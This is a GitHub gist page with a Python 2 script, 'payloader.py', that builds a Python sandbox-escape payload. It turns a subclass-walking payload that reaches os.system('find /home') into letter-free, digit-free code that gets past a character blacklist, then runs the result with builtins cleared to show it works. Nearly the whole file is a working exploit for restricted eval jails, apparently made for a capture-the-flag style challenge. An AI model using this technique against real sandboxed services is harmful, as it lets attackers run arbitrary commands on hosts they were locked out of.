Skip to content

Instantly share code, notes, and snippets.

@daeken

daeken/payloader.py

Last active December 16, 2015 12:38
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save daeken/5435681 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save daeken/5435681 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
payloader.py
# -*- coding: utf-8 -*-
from sys import exit
rw = lambda x: str(x).replace('-2', "~({}<())").replace('-1', "~(''<'')").replace('0', "~~(''<'')").replace('1', "~~({}<())")
disallowed = '!"#$&*+-/0123456789;=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^abcdefghijklmnopqrstuvwxyz|\r'
#payload = "().__class__.__subclasses__()[0].__new__.__globals__['__builtins__']['input']()"
payload = "().__class__.__bases__[0].__subclasses__()[48].__init__.__globals__['linecache'].os.system('find /home')"
fstr = ''
for i, c in enumerate(payload):
if c in '$':
fstr += '___%\xdd'
elif c in '0123456789abcdef':
fstr += chr(0xC0 | int(c, 16))
elif c in disallowed or c in "'\n ":
fstr += "___%\xcc"
elif c == '%':
fstr += '___%___%'
else:
fstr += '___%s' % c
formatter = '`\'%s\'`' % fstr
formatter += rw("[1<<1<<1::1<<1<<1]")
formatter += '%('
charsizes = {}
ppots = rw('''1
1<<1
1<<1<<1
1<<~(-2<<1)
1<<~(-2<<1)<<1
1<<~(-2<<1)<<1<<1
1<<~(-2<<1)<<~(-2<<1)
1<<~(-2<<1)<<~(-2<<1)<<1
''').split('\n')
npots = rw('''-1
-2
-2<<1
-2<<1<<1
-2<<~(-2<<1)
-2<<(1<<1<<1)
-2<<(1<<1<<1)<<1
-2<<~(-2<<1)<<~(-2<<1)
''').split('\n')
#for i in xrange(8):
# print i, 1<<i, eval(ppots[i]), '*%i*' % len(ppots[i])
#for i in xrange(8):
# print i, -1<<i, eval(npots[i]), '*%i*' % len(npots[i])
#exit()
for c in payload:
oc = c
start = len(formatter)
if c not in disallowed and c not in "'\n ":
pass#formatter += `c` + ','
elif c == '$':
formatter += rw(-1) + ','
elif c == "'":
formatter += "`''`["
formatter += rw(0)
formatter += '],'
elif c in '0123456789bcdef':
pass
elif c in '\\x':
formatter += "`'\xc0'`["
if c == '\\':
formatter += rw(1)
elif c == 'x':
formatter += rw('1<<1')
formatter += '],'
elif c in 'True':
formatter += '`{}<()`['
if c == 'T':
formatter += rw(0)
elif c == 'r':
formatter += rw(1)
elif c == 'u':
formatter += rw(-2)
elif c == 'e':
formatter += rw(-1)
formatter += '],'
elif c in 'False':
formatter += "`''<''`["
if c == 'F':
formatter += rw(0)
elif c == 'a':
formatter += rw(1)
elif c == 'l':
formatter += rw('1<<1')
elif c == 's':
formatter += rw(-2)
elif c == 'e':
formatter += rw(-1)
formatter += '],'
elif c == '-':
formatter += "`~(''<'')`["
formatter += rw(0)
formatter += '],'
elif c == ' ':
formatter += ppots[5] + ','
else:
c = ord(c)
blength = c.bit_length()
init = '~(' + npots[blength] + ')'
ival = (1<<blength) - 1
first = True
while ival > c:
diff = ival - c
target = diff.bit_length() - 1
tx = npots[target]
ival -= 1 << target
if ival == c and target < 2:
init = tx + '%(' + init + ')'
else:
if first:
init = "(" + tx + ")%" + init + ''
else:
init = "(" + tx + ")%(" + init + ')'
first = False
formatter += init + ','
charsizes[oc] = len(formatter) - start
formatter = formatter[:-1]
formatter += ')'
print charsizes
print formatter
print len(formatter)
file('payload.py', 'w').write(formatter)
print `eval(formatter, {})`
a = None
_eval = eval
ident = ''.join((chr(i) for i in xrange(256)))
__builtins__.__dict__.clear()
__builtins__ = None
exec 'a=' + _eval(formatter, {}) in {}
print 'return value:', a
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment